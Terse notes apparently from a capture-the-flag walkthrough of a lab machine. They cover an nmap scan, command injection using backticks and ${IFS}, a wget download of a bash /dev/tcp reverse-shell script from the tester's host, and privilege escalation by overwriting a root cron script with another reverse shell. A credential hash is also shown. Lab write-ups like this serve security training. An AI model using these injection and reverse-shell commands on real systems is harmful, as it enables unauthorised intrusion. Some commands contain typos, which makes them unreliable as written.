Walkthrough
Gaining a Foothold
Nmap
Quick scan
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.188.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 16:55 EST
Nmap scan report for 10.10.188.225
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 36.51 seconds
Web Page
10.10.188.225:80
10.10.188.225:80/admin
Burp Suite > Proxy > Repeater
Trying to go out and look for a page but cannot resolve
Try command ls
Search youtube dll
Use backticks for command injection
`ls` > u-admin is not valid
`ls -la` > end of file
`ls%20la` > error
${IFS} > special shell variable (Internal Field Separator)
`ping${IFS} 127.0.0.1`
Using wget for command injection on Burp Suite
Create a script for reverse shell and call it script.sh
bash -i >& /dev/tcp/10.8.252.53/8000 0>&1
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
`wget${IFS}http://10.8.252.53:7777/script.sh`
We get response OK
`chmod{$IFS}777script.sh`
Set up a listener on port 7777
It doesn’t like the dot
Run the script.sh using bash command
Shell
www-data
Not necessarily who we want to be
We can run linpeas but doesn’t help too much
crontab -l
cat /etc/crontab
ps aux > cron is being used by root but we don’t know what is being used
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
TTY shell
Escalating Privileges
pspy
https://github.com/DominicBreuker/pspy?tab=readme-ov-file
pspy is a command line tool designed to snoop on processes without need for root permissions. It lets you see commands run by other users, cron jobs, etc., as they execute.
wget HTTP://10.8.252.53/pspy64
chmod +x pspy
./pspy
After a minute, we see clean.sh being executed > cron file overwrite
Change mod of clean.sh to 777 as we are the owner of current directory
Cat clean.sh to see what is going on
Modify or append clean.sh to connect reverse shell back to my machine
echo ‘bash -i >& /dev/tcp/10.8.252.53/9999 0>&1’ > clean.sh
Set up a listener on port 9999 and wait
